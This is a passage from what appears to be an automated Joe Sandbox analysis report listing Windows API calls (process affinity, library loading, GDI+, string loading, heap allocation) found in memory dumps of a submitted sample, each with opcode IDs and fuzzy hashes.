                                                                    • GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,00DA31C7,00D9D526), ref: 00DA3191
                                                                    • GetProcessAffinityMask.KERNEL32(00000000,?,00DA31C7), ref: 00DA3198
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$AffinityCurrentMask
                                                                    • String ID:
                                                                    • API String ID: 1231390398-0
                                                                    • Opcode ID: ec132e8595e4a97ffc9aca5f9872c5f0bc5bbbfd1d6f47466ad12440e80b66cd
                                                                    • Instruction ID: 6e6a930e57e87fd85eea05ab49178682407a929f92c753ec5fb015a0294da619
                                                                    • Opcode Fuzzy Hash: ec132e8595e4a97ffc9aca5f9872c5f0bc5bbbfd1d6f47466ad12440e80b66cd
                                                                    • Instruction Fuzzy Hash: B7E04872F10306679F098BA49C059EB73DEDA452597144579B513E3300F974DE0557B4
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                    • String ID:
                                                                    • API String ID: 1175261203-0
                                                                    • Opcode ID: 2552a5149d442f00b466ca9d859f811498143187ff2aa4f1cfe4c71bfd7d2d24
                                                                    • Instruction ID: 814150c0521219a65cf566963d2013061440b5e376fc73ef31623b69463605c4
                                                                    • Opcode Fuzzy Hash: 2552a5149d442f00b466ca9d859f811498143187ff2aa4f1cfe4c71bfd7d2d24
                                                                    • Instruction Fuzzy Hash: 70F0BE35A00209ABCB10EB69CC04EEFB3FCEF49741F10006AB606E3200CA74EA858A74
                                                                    APIs
                                                                    • LoadStringW.USER32(00D97BEB,?,00D91436,00D97BEB), ref: 00DA05F8
                                                                    • LoadStringW.USER32(00D97BEB,?,00D91436), ref: 00DA060F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString
                                                                    • String ID:
                                                                    • API String ID: 2948472770-0
                                                                    • Opcode ID: 3ca3352d1bcdc55cb8d3a0ba8422ec90d2ab7e3535489191d907bef9439876e2
                                                                    • Instruction ID: 358790f0999c36f78c3a524869d7058ef49fbdb96cc1a73b018292c941d14f50
                                                                    • Opcode Fuzzy Hash: 3ca3352d1bcdc55cb8d3a0ba8422ec90d2ab7e3535489191d907bef9439876e2
                                                                    • Instruction Fuzzy Hash: A4F07F35201219BB9F111F51EC089FA7F6AFF4A395B089426FD0896225D6328960EBB0
                                                                    APIs
                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00DC505D,000000FF), ref: 00DACD7D
                                                                    • OleUninitialize.OLE32(?,?,?,?,00DC505D,000000FF), ref: 00DACD82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: GdiplusShutdownUninitialize
                                                                    • String ID:
                                                                    • API String ID: 3856339756-0
                                                                    • Opcode ID: d5a00371511241c725ee730fed7b187b72e85c9ba222d19b5875c4fd9307629a
                                                                    • Instruction ID: 55608a3140d8547730b036632964c709c8deec76fafcc7c5985f5ede8920ac3b
                                                                    • Opcode Fuzzy Hash: d5a00371511241c725ee730fed7b187b72e85c9ba222d19b5875c4fd9307629a
                                                                    • Instruction Fuzzy Hash: 06F05E76604645EFC700DF19DC01F9AFBA8FB49B20F00826BE816C3760DB34A900CAA4
                                                                    APIs
                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DAC36E
                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00DAC375
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: BitmapCreateFromGdipStream
                                                                    • String ID:
                                                                    • API String ID: 1918208029-0
                                                                    • Opcode ID: 7f3880521388d9a683eb976b3ee26be058ff1eb66f8a0480b70fe3679e4cbbc6
                                                                    • Instruction ID: 9d0a5412e579d5c5827df0eac52727618805e62ba6ca87994d4e21f2c9f952e4
                                                                    • Opcode Fuzzy Hash: 7f3880521388d9a683eb976b3ee26be058ff1eb66f8a0480b70fe3679e4cbbc6
                                                                    • Instruction Fuzzy Hash: 72E0ED75915258EBCB10EF95C541BD9B7F8EB05360F10C05EE89693201D770AE449F71
                                                                    APIs
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DB51CA
                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00DB51D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                    • String ID:
                                                                    • API String ID: 1660781231-0
                                                                    • Opcode ID: 08e9ecf4097f204e7f106573affef99f85edb9e45226dacd142a83fe5f228cfc
                                                                    • Instruction ID: 347776bb634fe9c88e4d841faee0b068e7abeef6ac695f511a07ce7e3e76f4b6
                                                                    • Opcode Fuzzy Hash: 08e9ecf4097f204e7f106573affef99f85edb9e45226dacd142a83fe5f228cfc
                                                                    • Instruction Fuzzy Hash: 20D0A724D44B00D85C10367838027EA3750D9117F43B01646E423896C9DE15C4445131
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemShowWindow
                                                                    • String ID:
                                                                    • API String ID: 3351165006-0
                                                                    • Opcode ID: ccc86773b9d6dde70334b665f12725420f714ca2f0690674742cbb1ed11c31f9
                                                                    • Instruction ID: d0efe6902958b76319f8857a8dc94e25e087fd04a3fe9776aa130d2bf7d4545e
                                                                    • Opcode Fuzzy Hash: ccc86773b9d6dde70334b665f12725420f714ca2f0690674742cbb1ed11c31f9
                                                                    • Instruction Fuzzy Hash: A5C0123205C300BECB010BB0EC09CBABBA8ABA4212F10CA08F0A6C11A0C239C024DB21
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: 69424f3ac292edeb5045d6caef089b48130fc5598a7258b8d3bbbeca8f44e306
                                                                    • Instruction ID: 35d9206732927fb4c22dddad332d1365573461a10274bef5fe3cefb1df57cda2
                                                                    • Opcode Fuzzy Hash: 69424f3ac292edeb5045d6caef089b48130fc5598a7258b8d3bbbeca8f44e306
                                                                    • Instruction Fuzzy Hash: 8BC18378A042569FDF25CF24C484BA9BBA5AF1A310F1C01B9EC06DB396CB35DA44CB71
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00D91483
                                                                      • Part of subcall function 00D96AE8: __EH_prolog3.LIBCMT ref: 00D96AEF
                                                                      • Part of subcall function 00D9EE0F: __EH_prolog3.LIBCMT ref: 00D9EE16
                                                                      • Part of subcall function 00D9668F: __EH_prolog3.LIBCMT ref: 00D96696
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: e42a9ec3d03d5eef0981017a3d9436dd833facfb0e92c24356b307a726d4b157
                                                                    • Instruction ID: 0fa8ce281ea55c02f6ca40d5017b0b7cddb944839ce067f3ef190d6417e94c5e
                                                                    • Opcode Fuzzy Hash: e42a9ec3d03d5eef0981017a3d9436dd833facfb0e92c24356b307a726d4b157
                                                                    • Instruction Fuzzy Hash: 1D4124B5A0A3808ECF14DF6994812D97BE2AF59300F0805BEEC5DCF29AD7715215CB72
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: 64b01f4a1a78c86de4d6c866440b8ff6aab8157b1640b3bdf024bde9707545e5
                                                                    • Instruction ID: cae204e6c0bfda1f0a65769d8094a29585de1f69ab3855c6b365bb089503db30
                                                                    • Opcode Fuzzy Hash: 64b01f4a1a78c86de4d6c866440b8ff6aab8157b1640b3bdf024bde9707545e5
                                                                    • Instruction Fuzzy Hash: 8B21D6B5E41612DFDB14EFB4DC4276A76A8FB05314F48023AE506EB286D7B09900C7B9
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00DBD348
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID:
                                                                    • API String ID: 190572456-0
                                                                    • Opcode ID: de7d8a7b7d1e0172bcfdc350fbb124a0efb7b824bf86a6cbe784d2c259778f2f
                                                                    • Instruction ID: 124ca48b9c247267ec2c139adbbdeb370688f33e729b1df6aef2ac4e8e2c69c8
                                                                    • Opcode Fuzzy Hash: de7d8a7b7d1e0172bcfdc350fbb124a0efb7b824bf86a6cbe784d2c259778f2f
                                                                    • Instruction Fuzzy Hash: D111A733A01625EB9B259E29EC409EE73D7EB8536071A4221ED16EB355E631EC0186F2
                                                                    APIs
                                                                      • Part of subcall function 00DBD786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DBB9D3,00000001,00000364,?,00DB688D,?,?,00DD50C4), ref: 00DBD7C7
                                                                    • _free.LIBCMT ref: 00DBEB35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                    • Instruction ID: 9f8637919bc6a71f20eb489ef3780fd4cda927d9f81ff475d32993e3c9abad4b
                                                                    • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                    • Instruction Fuzzy Hash: F601D672600345ABE325CF69D881DDAFBEDFB85370F25051DE59683280EA70A805C678
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: 818587ba038f6af61dba0df71033380335de82cf8f1c2e6a12f9d214563720bf
                                                                    • Instruction ID: bbe7bc5a359fbc991bcf22edae02971542a1dfde1c3be542001de4ae6ff2cf7f
                                                                    • Opcode Fuzzy Hash: 818587ba038f6af61dba0df71033380335de82cf8f1c2e6a12f9d214563720bf
                                                                    • Instruction Fuzzy Hash: 6401613690062A9BCF25AF688892AAEB376EF44704B054519FD11AB241CB348C00C6F5
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00D9EE16
                                                                      • Part of subcall function 00D96AE8: __EH_prolog3.LIBCMT ref: 00D96AEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: fdfcf110d28f60035d3180b48ea1b2532a423d0bdeb6bfeb1a6da69202c90bec
                                                                    • Instruction ID: 7f4bf1667d765160a9dd75dfb8fc95f658747e22046323c8f00b5716707b7642
                                                                    • Opcode Fuzzy Hash: fdfcf110d28f60035d3180b48ea1b2532a423d0bdeb6bfeb1a6da69202c90bec
                                                                    • Instruction Fuzzy Hash: 21019E64A04340CAEF11EBB999167AEBBE0AF44300F54485DE486E7382EE748B00C775
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DBB9D3,00000001,00000364,?,00DB688D,?,?,00DD50C4), ref: 00DBD7C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 7f08bee6f0e703b0b7839a0269020a985ffce9cfe06301125c23a219865a1900
                                                                    • Instruction ID: 61f0e84e10d53f6234ec6b2bee47a899e5c70153b425a4460e0380ece659ce81
                                                                    • Opcode Fuzzy Hash: 7f08bee6f0e703b0b7839a0269020a985ffce9cfe06301125c23a219865a1900
                                                                    • Instruction Fuzzy Hash: 2BF0B431200721E79B216E769C41BDB778ADF40770F184052E807D6695EE60DC0082F5
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: e083e9e6eb3b08f34592aaf36c64416dc21043375d016343f0a072c8b652f16d
                                                                    • Instruction ID: 622aa71d0fe06020a0077399acdd933d8857daf3159e8874d0ef7d19eddb5639
                                                                    • Opcode Fuzzy Hash: e083e9e6eb3b08f34592aaf36c64416dc21043375d016343f0a072c8b652f16d
                                                                    • Instruction Fuzzy Hash: C9F068B5A41701EAD731EB608853FDF7AE8EF84B04F800419B25AA72C3DBB053048679
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 06982c0876210ee6d64f1c79b5f908cf646cf6e733eec8ef9544c69ef43d2657
                                                                    • Instruction ID: f04852a69881030670ae7646134034ddf0bc982569ce542a1c1b3c7d87e08d6f
                                                                    • Opcode Fuzzy Hash: 06982c0876210ee6d64f1c79b5f908cf646cf6e733eec8ef9544c69ef43d2657
                                                                    • Instruction Fuzzy Hash: F9E03925200626E6D731AB769C01BEB7E48DF913B0F290123AC47A6692CFE5CC0186F5
                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,00D9AF75,E7604376,00000000,00DC517A,000000FF,?,00D98882,?,?), ref: 00D9AFEB
